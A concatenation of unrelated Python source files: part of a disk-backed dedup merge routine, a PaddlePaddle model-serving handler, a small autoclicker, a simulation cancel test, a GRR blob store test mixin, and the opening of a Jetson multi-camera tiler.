        # create an new empty buffer
        self._buffer = {}

    def merge_check(self, buffer_to_merge):
        """Background merge: sort-merge the sorted in-memory snapshot
        (`buffer_to_merge`) with the sorted on-disk file, writing the union to
        the next file version and forwarding records that are new to disk.
        Runs under _merge_lock for its whole duration."""
        self._merge_lock.acquire()
        logging.debug('*'*40)
        try:
            from_file_path = os.path.join(self.due_dir, 'data.%d' % self.file_version)
            self.file_version += 1
            to_file_path = os.path.join(self.due_dir, 'data.%d' % self.file_version)
            if not os.path.exists(from_file_path):
                # create an empty file
                from_file = open(from_file_path, 'w')
                from_file.close()
            from_file = open(from_file_path, 'r')
            to_file = open(to_file_path, 'w')
            # buffer used to load from disk file
            disk_input_buffer = Queue.Queue(self._buffer_size_limit)
            # buffer used to dump to disk file
            disk_output_buffer = Queue.Queue(self._buffer_size_limit)

            def get_left(from_file, disk_input_buffer):
                # Next (md5, batch) from the disk side; (None, None) at EOF.
                # if input buffer is empty, try to fill it
                if disk_input_buffer.empty():
                    try:
                        pairs = cPickle.load(from_file)
                    except EOFError:
                        return None, None
                    except:
                        logging.exception('Fail to load in merge_check:')
                        return None, None
                    else:
                        for (md5, batch) in pairs:
                            disk_input_buffer.put((md5, batch), block=False)
                if not disk_input_buffer.empty():
                    md5, batch = disk_input_buffer.get(block=False)
                    return md5, batch
                else:
                    logging.error('[BUG] [due.py merge_check()] disk_input_buffer should not be empty here')
                    return None, None

            def get_right(buffer_to_merge):
                # Next resource from the in-memory side; None when exhausted.
                try:
                    r = buffer_to_merge.get(block=False)
                except Queue.Empty:
                    r = None
                return r

            def dump_record(md5, batch, to_file, disk_output_buffer):
                if disk_output_buffer.full():
                    clear_output_buffer(to_file, disk_output_buffer)
                # add to buffer
                disk_output_buffer.put((md5, batch), block=False)

            def clear_output_buffer(to_file, disk_output_buffer):
                # Pickle the accumulated pairs as one chunk (mirrors get_left).
                out_pairs = []
                while not disk_output_buffer.empty():
                    out_pairs.append(disk_output_buffer.get(block=False))
                cPickle.dump(out_pairs, to_file)

            # Classic two-way merge over the two md5-sorted streams.
            md51, batch1 = get_left(from_file, disk_input_buffer)
            r2 = get_right(buffer_to_merge)
            while md51 is not None and r2 is not None:
                if md51 == r2.md5:
                    if r2.batch > batch1:
                        # it's new
                        dump_record(r2.md5, r2.batch, to_file, disk_output_buffer)
                        self.forward(r2)
                    else:
                        # it's dup
                        dump_record(md51, batch1, to_file, disk_output_buffer)
                        self.disk_hit_count += 1
                    md51, batch1 = get_left(from_file, disk_input_buffer)
                    r2 = get_right(buffer_to_merge)
                elif md51 < r2.md5:
                    # output left
                    dump_record(md51, batch1, to_file, disk_output_buffer)
                    md51, batch1 = get_left(from_file, disk_input_buffer)
                else:
                    # output and forward r2
                    dump_record(r2.md5, r2.batch, to_file, disk_output_buffer)
                    self.forward(r2)
                    r2 = get_right(buffer_to_merge)
            # output the rest
            while md51 is not None:
                dump_record(md51, batch1, to_file, disk_output_buffer)
                md51, batch1 = get_left(from_file, disk_input_buffer)
            while r2 is not None:
                dump_record(r2.md5, r2.batch, to_file, disk_output_buffer)
                self.forward(r2)
                r2 = get_right(buffer_to_merge)
            # clear output buffer
            clear_output_buffer(to_file, disk_output_buffer)
            from_file.close()
            to_file.close()
            # remove from_file
            if not self.keep_file:
                os.remove(from_file_path)
            logging.debug('-'*40)
        finally:
            self._merge_lock.release()
local_service_handler.py
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import logging
import multiprocessing
from .error_catch import ErrorCatch, CustomException, CustomExceptionCode
#from paddle_serving_server import OpMaker, OpSeqMaker
#from paddle_serving_server import Server as GpuServer
#from paddle_serving_server import Server as CpuServer
from . import util
#from paddle_serving_app.local_predict import LocalPredictor

_LOGGER = logging.getLogger(__name__)
_workdir_name_gen = util.NameGenerator("workdir_")


class LocalServiceHandler(object):
    """
    LocalServiceHandler is the processor of the local service, contains
    three client types, brpc, grpc and local_predictor.If you use the
    brpc or grpc, serveing startup ability is provided.If you use
    local_predictor, local predict ability is provided by paddle_serving_app.
    """

    def __init__(self,
                 model_config,
                 client_type='local_predictor',
                 workdir="",
                 thread_num=2,
                 device_type=-1,
                 devices="",
                 fetch_names=None,
                 mem_optim=True,
                 ir_optim=False,
                 available_port_generator=None,
                 use_profile=False,
                 precision="fp32",
                 use_mkldnn=False,
                 mkldnn_cache_capacity=0,
                 mkldnn_op_list=None,
                 mkldnn_bf16_op_list=None):
        """
        Initialization of localservicehandler

        Args:
           model_config: model config path
           client_type: brpc, grpc and local_predictor[default]
           workdir: work directory
           thread_num: number of threads, concurrent quantity.
           device_type: support multiple devices. -1=Not set, determined by
               `devices`. 0=cpu, 1=gpu, 2=tensorRT, 3=arm cpu, 4=kunlun xpu
           devices: gpu id list[gpu], "" default[cpu]
           fetch_names: get fetch names out of LocalServiceHandler in
               local_predictor mode. fetch_names_ is compatible for Client().
           mem_optim: use memory/graphics memory optimization, True default.
           ir_optim: use calculation chart optimization, False default.
           available_port_generator: generate available ports
           use_profile: use profiling, False default.
           precision: inference precesion, e.g. "fp32", "fp16", "int8"
           use_mkldnn: use mkldnn, default False.
           mkldnn_cache_capacity: cache capacity of mkldnn, 0 means no limit.
           mkldnn_op_list: OP list optimized by mkldnn, None default.
           mkldnn_bf16_op_list: OP list optimized by mkldnn bf16, None default.

        Returns:
           None
        """
        if available_port_generator is None:
            available_port_generator = util.GetAvailablePortGenerator()

        self._model_config = model_config
        self._port_list = []
        # Defaults below are overwritten by the device_type dispatch that follows.
        self._device_name = "cpu"
        self._use_gpu = False
        self._use_trt = False
        self._use_lite = False
        self._use_xpu = False
        self._use_ascend_cl = False
        self._use_mkldnn = False
        self._mkldnn_cache_capacity = 0
        self._mkldnn_op_list = None
        self._mkldnn_bf16_op_list = None

        # Map device_type (+ devices string) onto device name/flags; `devices`
        # is normalized from a comma-separated string to a list of int ids
        # (-1 meaning CPU).
        if device_type == -1:
            # device_type is not set, determined by `devices`,
            if devices == "":
                # CPU
                self._device_name = "cpu"
                devices = [-1]
            else:
                # GPU
                self._device_name = "gpu"
                self._use_gpu = True
                devices = [int(x) for x in devices.split(",")]
        elif device_type == 0:
            # CPU
            self._device_name = "cpu"
            devices = [-1]
        elif device_type == 1:
            # GPU
            self._device_name = "gpu"
            self._use_gpu = True
            devices = [int(x) for x in devices.split(",")]
        elif device_type == 2:
            # Nvidia Tensor RT
            self._device_name = "gpu"
            self._use_gpu = True
            devices = [int(x) for x in devices.split(",")]
            self._use_trt = True
        elif device_type == 3:
            # ARM CPU
            self._device_name = "arm"
            devices = [-1]
            self._use_lite = True
        elif device_type == 4:
            # Kunlun XPU
            self._device_name = "arm"
            devices = [int(x) for x in devices.split(",")]
            self._use_lite = True
            self._use_xpu = True
        elif device_type == 5:
            # Ascend 310 ARM CPU
            self._device_name = "arm"
            devices = [int(x) for x in devices.split(",")]
            self._use_lite = True
            self._use_ascend_cl = True
        elif device_type == 6:
            # Ascend 910 ARM CPU
            self._device_name = "arm"
            devices = [int(x) for x in devices.split(",")]
            self._use_ascend_cl = True
        else:
            # NOTE(review): only logs — does not raise — and leaves `devices`
            # as the raw string; downstream code will then index/iterate a
            # str. Confirm whether this should raise instead.
            _LOGGER.error(
                "LocalServiceHandler initialization fail. device_type={}"
                .format(device_type))

        # brpc/grpc servers need one network port per device.
        if client_type == "brpc" or client_type == "grpc":
            for _ in devices:
                self._port_list.append(available_port_generator.next())
            _LOGGER.info("Create ports for devices:{}. Port:{}"
                         .format(devices, self._port_list))

        self._client_type = client_type
        self._workdir = workdir
        self._devices = devices
        self._thread_num = thread_num
        self._mem_optim = mem_optim
        self._ir_optim = ir_optim
        self._local_predictor_client = None
        self._rpc_service_list = []
        self._server_pros = []
        self._use_profile = use_profile
        self._fetch_names = fetch_names
        self._precision = precision
        self._use_mkldnn = use_mkldnn
        self._mkldnn_cache_capacity = mkldnn_cache_capacity
        self._mkldnn_op_list = mkldnn_op_list
        self._mkldnn_bf16_op_list = mkldnn_bf16_op_list

        _LOGGER.info(
            "Models({}) will be launched by device {}. use_gpu:{}, "
            "use_trt:{}, use_lite:{}, use_xpu:{}, device_type:{}, devices:{}, "
            "mem_optim:{}, ir_optim:{}, use_profile:{}, thread_num:{}, "
            "client_type:{}, fetch_names:{}, precision:{}, use_mkldnn:{}, "
            "mkldnn_cache_capacity:{}, mkldnn_op_list:{}, "
            "mkldnn_bf16_op_list:{}, use_ascend_cl:{}".format(
                model_config, self._device_name, self._use_gpu, self._use_trt,
                self._use_lite, self._use_xpu, device_type, self._devices,
                self._mem_optim, self._ir_optim, self._use_profile,
                self._thread_num, self._client_type, self._fetch_names,
                self._precision, self._use_mkldnn, self._mkldnn_cache_capacity,
                self._mkldnn_op_list, self._mkldnn_bf16_op_list,
                self._use_ascend_cl))

    def get_fetch_list(self):
        # Fetch names; may be None until _prepare_one_server fills them in.
        return self._fetch_names

    def get_port_list(self):
        # Ports allocated in __init__ (brpc/grpc only; empty for local_predictor).
        return self._port_list

    def get_client(self, concurrency_idx):
        """
        Function get_client is only used for local predictor case, creates one
        LocalPredictor object, and initializes the paddle predictor by function
        load_model_config.The concurrency_idx is used to select running devices.

        Args:
            concurrency_idx: process/thread index

        Returns:
            _local_predictor_client
        """
        #checking the legality of concurrency_idx.
        device_num = len(self._devices)
        if device_num <= 0:
            # NOTE(review): message is inverted — the failing condition is
            # device_num <= 0, so it should read "must be greater than 0".
            _LOGGER.error("device_num must be not greater than 0. devices({})".
                          format(self._devices))
            raise ValueError("The number of self._devices error")

        if concurrency_idx < 0:
            # NOTE(review): "one positive number" — negative indices are
            # clamped to 0 rather than rejected; message says "positive" but
            # 0 is accepted (non-negative is what is enforced).
            _LOGGER.error("concurrency_idx({}) must be one positive number".
                          format(concurrency_idx))
            concurrency_idx = 0
        elif concurrency_idx >= device_num:
            # Wrap around so any worker index maps onto a valid device.
            concurrency_idx = concurrency_idx % device_num

        _LOGGER.info("GET_CLIENT : concurrency_idx={}, device_num={}".format(
            concurrency_idx, device_num))
        from paddle_serving_app.local_predict import LocalPredictor
        if self._local_predictor_client is None:
            self._local_predictor_client = LocalPredictor()
            # load model config and init predictor
            self._local_predictor_client.load_model_config(
                model_path=self._model_config,
                use_gpu=self._use_gpu,
                gpu_id=self._devices[concurrency_idx],
                use_profile=self._use_profile,
                thread_num=self._thread_num,
                mem_optim=self._mem_optim,
                ir_optim=self._ir_optim,
                use_trt=self._use_trt,
                use_lite=self._use_lite,
                use_xpu=self._use_xpu,
                precision=self._precision,
                use_mkldnn=self._use_mkldnn,
                mkldnn_cache_capacity=self._mkldnn_cache_capacity,
                mkldnn_op_list=self._mkldnn_op_list,
                mkldnn_bf16_op_list=self._mkldnn_bf16_op_list,
                use_ascend_cl=self._use_ascend_cl)
        return self._local_predictor_client

    def get_client_config(self):
        # Path of the generated server-side proto config inside the model dir.
        return os.path.join(self._model_config, "serving_server_conf.prototxt")

    def _prepare_one_server(self, workdir, port, gpuid, thread_num, mem_optim,
                            ir_optim, precision):
        """
        According to self._device_name, generating one Cpu/Gpu/Arm Server, and
        setting the model config amd startup params.

        Args:
            workdir: work directory
            port: network port
            gpuid: gpu id
            thread_num: thread num
            mem_optim: use memory/graphics memory optimization
            ir_optim: use calculation chart optimization
            precision: inference precison, e.g."fp32", "fp16", "int8"

        Returns:
            server: CpuServer/GpuServer
        """
        if self._device_name == "cpu":
            from paddle_serving_server import OpMaker, OpSeqMaker, Server
            op_maker = OpMaker()
            read_op = op_maker.create('general_reader')
            general_infer_op = op_maker.create('general_infer')
            general_response_op = op_maker.create('general_response')

            op_seq_maker = OpSeqMaker()
            op_seq_maker.add_op(read_op)
            op_seq_maker.add_op(general_infer_op)
            op_seq_maker.add_op(general_response_op)

            server = Server()
        else:
            #gpu or arm
            from paddle_serving_server import OpMaker, OpSeqMaker, Server
            op_maker = OpMaker()
            read_op = op_maker.create('general_reader')
            general_infer_op = op_maker.create('general_infer')
            general_response_op = op_maker.create('general_response')

            op_seq_maker = OpSeqMaker()
            op_seq_maker.add_op(read_op)
            op_seq_maker.add_op(general_infer_op)
            op_seq_maker.add_op(general_response_op)

            server = Server()
            if gpuid >= 0:
                server.set_gpuid(gpuid)
            # TODO: support arm or arm + xpu later
            server.set_device(self._device_name)
            if self._use_xpu:
                server.set_xpu()
            if self._use_lite:
                server.set_lite()
            if self._use_ascend_cl:
                server.set_ascend_cl()

        server.set_op_sequence(op_seq_maker.get_op_sequence())
        server.set_num_threads(thread_num)
        server.set_memory_optimize(mem_optim)
        server.set_ir_optimize(ir_optim)
        server.set_precision(precision)

        server.load_model_config(self._model_config)
        server.prepare_server(
            workdir=workdir, port=port, device=self._device_name)
        # First prepared server supplies the fetch names if none were given.
        if self._fetch_names is None:
            self._fetch_names = server.get_fetch_list()
        return server

    def _start_one_server(self, service_idx):
        """
        Start one server

        Args:
            service_idx: server index

        Returns:
            None
        """
        self._rpc_service_list[service_idx].run_server()

    def prepare_server(self):
        """
        Prepare all servers to be started, and append them into list.
        """
        for i, device_id in enumerate(self._devices):
            if self._workdir != "":
                workdir = "{}_{}".format(self._workdir, i)
            else:
                workdir = _workdir_name_gen.next()
            self._rpc_service_list.append(
                self._prepare_one_server(
                    workdir,
                    self._port_list[i],
                    device_id,
                    thread_num=self._thread_num,
                    mem_optim=self._mem_optim,
                    ir_optim=self._ir_optim,
                    precision=self._precision))

    def start_server(self):
        """
        Start multiple processes and start one server in each process
        """
        for i, _ in enumerate(self._rpc_service_list):
            # daemon=True so server processes die with the parent.
            p = multiprocessing.Process(
                target=self._start_one_server, args=(i, ))
            p.daemon = True
            self._server_pros.append(p)

        for p in self._server_pros:
            p.start()
main.py
''' ################################### # PYTHON AUTOCLICKER # # BY Divdude77 # ################################### ''' ############################################# # READ readme.md BEFORE RUNNING THIS SCRIPT # ############################################# import pyautogui import keyboard import threading import time # Key which activates autoclicker key = "v" def clickthread(): pyautogui.click() print("Autoclicker Initiated!") while True: if keyboard.is_pressed(key): while keyboard.is_pressed(key): time.sleep(0) # Delay between each click (0 -> Fastest clicking) x = threading.Thread(target=clickthread) x.start()
cancel_delay_test.py
# -*- coding: utf-8 -*-
u"""test cancel of sim with agent_start_delay

:copyright: Copyright (c) 2020 RadiaSoft LLC.  All Rights Reserved.
:license: http://www.apache.org/licenses/LICENSE-2.0.html
"""
from __future__ import absolute_import, division, print_function
import pytest

_REPORT = 'heightWeightReport'


def test_myapp(fc):
    """Race a runSimulation against a runCancel on a slow-starting agent,
    then verify a fresh run still produces plots."""
    from pykern import pkunit
    from pykern.pkdebug import pkdc, pkdp, pkdlog
    import threading
    import time

    data = fc.sr_sim_data()
    # The delay is smuggled to the test agent through this model field.
    data.models.dog.favoriteTreat = 'agent_start_delay=5'
    req = dict(
        forceRun=False,
        models=data.models,
        report=_REPORT,
        simulationId=data.models.simulation.simulationId,
        simulationType=data.simulationType,
    )

    def _post(api):
        fc.sr_post(api, req)

    # Fire runSimulation, give it a second, then fire runCancel and give
    # the cancel a second to land before the verification run.
    for api in ('runSimulation', 'runCancel'):
        threading.Thread(target=_post, args=(api,)).start()
        time.sleep(1)

    res = fc.sr_run_sim(data, _REPORT)
    pkdp('abc')
    plots = res.get('plots')
    pkunit.pkok(plots, 'expecting truthy r.plots={}', plots)
blob_store_test_mixin.py
#!/usr/bin/env python
"""Mixin class to be used in tests for BlobStore implementations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals

import abc
import threading
import time

from unittest import mock

from grr_response_core.lib import rdfvalue
from grr_response_server import blob_store
from grr_response_server.databases import mysql_blobs
from grr_response_server.rdfvalues import objects as rdf_objects
from grr.test_lib import stats_test_lib
from grr.test_lib import test_lib

# Index of the positional-arguments tuple inside a mock call_args record.
POSITIONAL_ARGS = 0


class BlobStoreTestMixin(stats_test_lib.StatsTestMixin, metaclass=abc.ABCMeta):
  """Mixin providing tests shared by all blob store tests implementations."""

  @abc.abstractmethod
  def CreateBlobStore(self):
    """Create a test blob store.

    Returns:
      A tuple (blob_store, cleanup), where blob_store is an instance of
      blob_store.BlobStore to be tested and cleanup is a function which
      destroys blob_store, releasing any resources held by it.
    """

  def setUp(self):
    super().setUp()
    bs, cleanup = self.CreateBlobStore()
    if cleanup is not None:
      self.addCleanup(cleanup)
    # Wrap the store so argument/result validation is exercised by every test.
    self.blob_store = blob_store.BlobStoreValidationWrapper(bs)

  def testCheckBlobsExistOnEmptyListReturnsEmptyDict(self):
    self.assertEqual(self.blob_store.CheckBlobsExist([]), {})

  def testReadBlobsOnEmptyListReturnsEmptyDict(self):
    self.assertEqual(self.blob_store.ReadBlobs([]), {})

  def testReadingNonExistentBlobReturnsNone(self):
    blob_id = rdf_objects.BlobID(b"01234567" * 4)
    result = self.blob_store.ReadBlob(blob_id)
    self.assertIsNone(result)

  def testReadingNonExistentBlobsReturnsNone(self):
    blob_id = rdf_objects.BlobID(b"01234567" * 4)
    result = self.blob_store.ReadBlobs([blob_id])
    self.assertEqual(result, {blob_id: None})

  def testSingleBlobCanBeWrittenAndThenRead(self):
    blob_id = rdf_objects.BlobID(b"01234567" * 4)
    blob_data = b"abcdef"

    self.blob_store.WriteBlobs({blob_id: blob_data})

    result = self.blob_store.ReadBlob(blob_id)
    self.assertEqual(result, blob_data)

  def testMultipleBlobsCanBeWrittenAndThenRead(self):
    blob_ids = [rdf_objects.BlobID((b"%d1234567" % i) * 4) for i in range(10)]
    blob_data = [b"a" * i for i in range(10)]

    self.blob_store.WriteBlobs(dict(zip(blob_ids, blob_data)))

    result = self.blob_store.ReadBlobs(blob_ids)
    self.assertEqual(result, dict(zip(blob_ids, blob_data)))

  def testWriting80MbOfBlobsWithSingleCallWorks(self):
    num_blobs = 80
    blob_ids = [
        rdf_objects.BlobID((b"%02d234567" % i) * 4) for i in range(num_blobs)
    ]
    blob_data = [b"a" * 1024 * 1024] * num_blobs

    self.blob_store.WriteBlobs(dict(zip(blob_ids, blob_data)))

    result = self.blob_store.ReadBlobs(blob_ids)
    self.assertEqual(result, dict(zip(blob_ids, blob_data)))

  def testCheckBlobExistsReturnsFalseForMissing(self):
    blob_id = rdf_objects.BlobID(b"11111111" * 4)
    self.assertFalse(self.blob_store.CheckBlobExists(blob_id))

  def testCheckBlobExistsReturnsTrueForExisting(self):
    blob_id = rdf_objects.BlobID(b"01234567" * 4)
    blob_data = b"abcdef"
    self.blob_store.WriteBlobs({blob_id: blob_data})
    self.assertTrue(self.blob_store.CheckBlobExists(blob_id))

  def testCheckBlobsExistCorrectlyReportsPresentAndMissingBlobs(self):
    blob_id = rdf_objects.BlobID(b"01234567" * 4)
    blob_data = b"abcdef"

    self.blob_store.WriteBlobs({blob_id: blob_data})

    other_blob_id = rdf_objects.BlobID(b"abcdefgh" * 4)
    result = self.blob_store.CheckBlobsExist([blob_id, other_blob_id])
    self.assertEqual(result, {blob_id: True, other_blob_id: False})

  # Chunk size 1 forces the MySQL implementation to split every byte, which
  # exercises chunk reassembly ordering.
  @mock.patch.object(mysql_blobs, "BLOB_CHUNK_SIZE", 1)
  def testLargeBlobsAreReassembledInCorrectOrder(self):
    blob_data = b"0123456789"
    blob_id = rdf_objects.BlobID(b"00234567" * 4)
    self.blob_store.WriteBlobs({blob_id: blob_data})
    result = self.blob_store.ReadBlobs([blob_id])
    self.assertEqual({blob_id: blob_data}, result)

  # 10 bytes / chunk size 3 leaves a short trailing chunk.
  @mock.patch.object(mysql_blobs, "BLOB_CHUNK_SIZE", 3)
  def testNotEvenlyDivisibleBlobsAreReassembledCorrectly(self):
    blob_data = b"0123456789"
    blob_id = rdf_objects.BlobID(b"00234567" * 4)
    self.blob_store.WriteBlobs({blob_id: blob_data})
    result = self.blob_store.ReadBlobs([blob_id])
    self.assertEqual({blob_id: blob_data}, result)

  def testOverwritingExistingBlobDoesNotRaise(self):
    blob_id = rdf_objects.BlobID(b"01234567" * 4)
    blob_data = b"abcdef"

    for _ in range(2):
      self.blob_store.WriteBlobs({blob_id: blob_data})

  @mock.patch.object(time, "sleep")
  def testReadAndWaitForBlobsWorksWithImmediateResults(self, sleep_mock):
    a_id = rdf_objects.BlobID(b"0" * 32)
    b_id = rdf_objects.BlobID(b"1" * 32)
    blobs = {a_id: b"aa", b_id: b"bb"}

    with mock.patch.object(
        self.blob_store, "ReadBlobs", return_value=blobs) as read_mock:
      results = self.blob_store.ReadAndWaitForBlobs(
          [a_id, b_id], timeout=rdfvalue.Duration.From(10, rdfvalue.SECONDS))

    # Everything was available on the first poll: no sleeping, one read.
    sleep_mock.assert_not_called()
    read_mock.assert_called_once()
    self.assertCountEqual(read_mock.call_args[POSITIONAL_ARGS][0],
                          [a_id, b_id])
    self.assertEqual({a_id: b"aa", b_id: b"bb"}, results)

  @mock.patch.object(time, "sleep")
  def testReadAndWaitForBlobsPollsUntilResultsAreAvailable(self, sleep_mock):
    a_id = rdf_objects.BlobID(b"0" * 32)
    b_id = rdf_objects.BlobID(b"1" * 32)
    # Four successive poll results: blobs trickle in one at a time.
    effect = [{
        a_id: None,
        b_id: None
    }, {
        a_id: b"aa",
        b_id: None
    }, {
        b_id: None
    }, {
        b_id: b"bb"
    }]

    with test_lib.FakeTime(rdfvalue.RDFDatetime.FromSecondsSinceEpoch(10)):
      with mock.patch.object(
          self.blob_store, "ReadBlobs", side_effect=effect) as read_mock:
        results = self.blob_store.ReadAndWaitForBlobs(
            [a_id, b_id], timeout=rdfvalue.Duration.From(10, rdfvalue.SECONDS))

    self.assertEqual({a_id: b"aa", b_id: b"bb"}, results)
    self.assertEqual(read_mock.call_count, 4)
    # Found blobs must be dropped from subsequent polls.
    self.assertCountEqual(read_mock.call_args_list[0][POSITIONAL_ARGS][0],
                          [a_id, b_id])
    self.assertCountEqual(read_mock.call_args_list[1][POSITIONAL_ARGS][0],
                          [a_id, b_id])
    self.assertCountEqual(read_mock.call_args_list[2][POSITIONAL_ARGS][0],
                          [b_id])
    self.assertCountEqual(read_mock.call_args_list[3][POSITIONAL_ARGS][0],
                          [b_id])
    self.assertEqual(sleep_mock.call_count, 3)

  def testReadAndWaitForBlobsStopsAfterTimeout(self):
    a_id = rdf_objects.BlobID(b"0" * 32)
    b_id = rdf_objects.BlobID(b"1" * 32)
    effect = [{a_id: b"aa", b_id: None}] + [{b_id: None}] * 3

    time_mock = test_lib.FakeTime(10)
    sleep_call_count = [0]

    def sleep(secs):
      # Advance fake time instead of blocking, and count polls.
      time_mock.time += secs
      sleep_call_count[0] += 1

    with time_mock, mock.patch.object(time, "sleep", sleep):
      with mock.patch.object(
          self.blob_store, "ReadBlobs", side_effect=effect) as read_mock:
        results = self.blob_store.ReadAndWaitForBlobs(
            [a_id, b_id], timeout=rdfvalue.Duration.From(3, rdfvalue.SECONDS))

    # b_id never materialized; it must be reported as None after the timeout.
    self.assertEqual({a_id: b"aa", b_id: None}, results)
    self.assertGreaterEqual(read_mock.call_count, 3)
    self.assertCountEqual(read_mock.call_args_list[0][POSITIONAL_ARGS][0],
                          [a_id, b_id])
    for i in range(1, read_mock.call_count):
      self.assertCountEqual(read_mock.call_args_list[i][POSITIONAL_ARGS][0],
                            [b_id])
    self.assertEqual(read_mock.call_count, sleep_call_count[0] + 1)

  @mock.patch.object(time, "sleep")
  def testReadAndWaitForBlobsPopulatesStats(self, sleep_mock):
    a_id = rdf_objects.BlobID(b"0" * 32)
    b_id = rdf_objects.BlobID(b"1" * 32)
    blobs = {a_id: b"aa", b_id: b"bb"}

    with mock.patch.object(self.blob_store, "ReadBlobs", return_value=blobs):
      # One latency and one iteration sample per found blob.
      with self.assertStatsCounterDelta(2,
                                        blob_store.BLOB_STORE_POLL_HIT_LATENCY):
        with self.assertStatsCounterDelta(
            2, blob_store.BLOB_STORE_POLL_HIT_ITERATION):
          self.blob_store.ReadAndWaitForBlobs([a_id, b_id],
                                              timeout=rdfvalue.Duration.From(
                                                  10, rdfvalue.SECONDS))

  def testWaitForBlobsDoesNotWaitIfBlobsAreAlreadyPresent(self):
    timeout = rdfvalue.Duration.From(0, rdfvalue.SECONDS)
    blobs = [b"foo", b"bar", b"baz"]
    blob_ids = self.blob_store.WriteBlobsWithUnknownHashes(blobs)

    # This should not throw anything.
    self.blob_store.WaitForBlobs(blob_ids, timeout=timeout)

    self.assertCountEqual(self.blob_store.ReadBlobs(blob_ids).values(), blobs)

  def testWaitForBlobsRaisesIfTimeoutIsZeroAndBlobsAreNotPresent(self):
    timeout = rdfvalue.Duration.From(0, rdfvalue.SECONDS)
    blob_ids = [
        rdf_objects.BlobID.FromBlobData(b"foo"),
        rdf_objects.BlobID.FromBlobData(b"bar"),
        rdf_objects.BlobID.FromBlobData(b"baz"),
    ]

    with self.assertRaises(blob_store.BlobStoreTimeoutError):
      self.blob_store.WaitForBlobs(blob_ids, timeout=timeout)

  def testWaitForBlobsWaitsIfBlobsAreNotAvailableImmediately(self):
    timeout = rdfvalue.Duration.From(5, rdfvalue.SECONDS)
    foo_blob = b"foo"
    bar_blob = b"bar"
    blob_ids = [
        rdf_objects.BlobID.FromBlobData(foo_blob),
        rdf_objects.BlobID.FromBlobData(bar_blob),
    ]

    wait = lambda: self.blob_store.WaitForBlobs(blob_ids, timeout=timeout)

    # FakeTimeline runs `wait` in a controllable fake-clock thread.
    with test_lib.FakeTimeline(threading.Thread(target=wait)) as timeline:
      # No blobs are in the database, should wait.
      timeline.Run(rdfvalue.Duration.From(1, rdfvalue.SECONDS))

      self.blob_store.WriteBlobWithUnknownHash(foo_blob)
      # Only one blob is in the database, should wait.
      timeline.Run(rdfvalue.Duration.From(1, rdfvalue.SECONDS))

      self.blob_store.WriteBlobWithUnknownHash(bar_blob)
      # All requested blobs are in the database, should finish.
      timeline.Run(rdfvalue.Duration.From(5, rdfvalue.SECONDS))

    blobs = self.blob_store.ReadBlobs(blob_ids).values()
    self.assertCountEqual(blobs, [foo_blob, bar_blob])

  def testWaitForBlobsRaisesIfNonZeroTimeoutIsReached(self):
    timeout = rdfvalue.Duration.From(5, rdfvalue.SECONDS)
    foo_blob = b"foo"
    bar_blob = b"bar"
    blob_ids = [
        rdf_objects.BlobID.FromBlobData(foo_blob),
        rdf_objects.BlobID.FromBlobData(bar_blob),
    ]

    wait = lambda: self.blob_store.WaitForBlobs(blob_ids, timeout=timeout)

    with test_lib.FakeTimeline(threading.Thread(target=wait)) as timeline:
      # No blobs are in the database, should wait.
      timeline.Run(rdfvalue.Duration.From(1, rdfvalue.SECONDS))

      self.blob_store.WriteBlobWithUnknownHash(foo_blob)
      # There is still one blob missing, it should raise if we run for 1 minute.
      with self.assertRaises(blob_store.BlobStoreTimeoutError):
        timeline.Run(rdfvalue.Duration.From(1, rdfvalue.MINUTES))

  def testWaitForBlobsUpdatesStats(self):
    latency = blob_store.BLOB_STORE_POLL_HIT_LATENCY
    iteration = blob_store.BLOB_STORE_POLL_HIT_ITERATION

    timeout = rdfvalue.Duration.From(10, rdfvalue.SECONDS)
    foo_blob = b"foo"
    bar_blob = b"bar"
    baz_blob = b"baz"
    blob_ids = [
        rdf_objects.BlobID.FromBlobData(foo_blob),
        rdf_objects.BlobID.FromBlobData(bar_blob),
        rdf_objects.BlobID.FromBlobData(baz_blob),
    ]

    wait = lambda: self.blob_store.WaitForBlobs(blob_ids, timeout=timeout)

    with test_lib.FakeTimeline(threading.Thread(target=wait)) as timeline:
      # No blobs at the beginning, so no events should be recorded.
      with self.assertStatsCounterDelta(0, latency):
        with self.assertStatsCounterDelta(0, iteration):
          timeline.Run(rdfvalue.Duration.From(2, rdfvalue.SECONDS))

      self.blob_store.WriteBlobWithUnknownHash(foo_blob)
      self.blob_store.WriteBlobWithUnknownHash(bar_blob)
      # Two blobs are written and should be picked up.
      with self.assertStatsCounterDelta(2, latency):
        with self.assertStatsCounterDelta(2, iteration):
          timeline.Run(rdfvalue.Duration.From(3, rdfvalue.SECONDS))

      self.blob_store.WriteBlobWithUnknownHash(baz_blob)
      # Last blob is written and should be picked up.
      with self.assertStatsCounterDelta(1, latency):
        with self.assertStatsCounterDelta(1, iteration):
          timeline.Run(rdfvalue.Duration.From(1, rdfvalue.SECONDS))
testH264_Jetson.py
"""Jetson TX2 multi-camera tiler.

Reads four side MJPEG cameras plus one main RTSP camera in worker processes,
overlays detection rectangles polled from per-camera HTTP endpoints, tiles
everything onto one canvas and streams it out as H.264 over RTP, while an
HTTP server offers the composed image as an MJPEG page.
"""
import os
import io
import re
import time
import logging
import multiprocessing as mp
from queue import Empty
from PIL import Image
from http import server
import socketserver
import numpy as np
import cv2
import urllib.request

# Number of side cameras to read (the main RTSP camera is handled separately).
Ncams = 1
# Video source per camera; the last entry is the main RTSP camera.
streamsVideo = ('http://192.168.0.20:8000', 'http://192.168.0.20:8000',
                'http://192.168.0.20:8000', 'http://192.168.0.20:8000',
                'rtsp://admin:12345@192.168.0.200/mpeg4')
# Per-camera endpoints serving detection rectangles as delimited text.
streamsRects = ('http://192.168.0.20:8000/data.html',
                'http://192.168.0.20:8000/data.html',
                'http://192.168.0.20:8000/data.html',
                'http://192.168.0.20:8000/data.html')


class objRect:
    """Axis-aligned rectangle (x0, x1, y0, y1) tagged with a camera side."""

    def __init__(self, rect=None, side=None):
        if rect:
            self.x0, self.x1, self.y0, self.y1 = rect
        else:
            self.x0 = self.x1 = self.y0 = self.y1 = 0
        # 0 = right cam, 1 = front cam, 2 = left cam, 3 = back cam
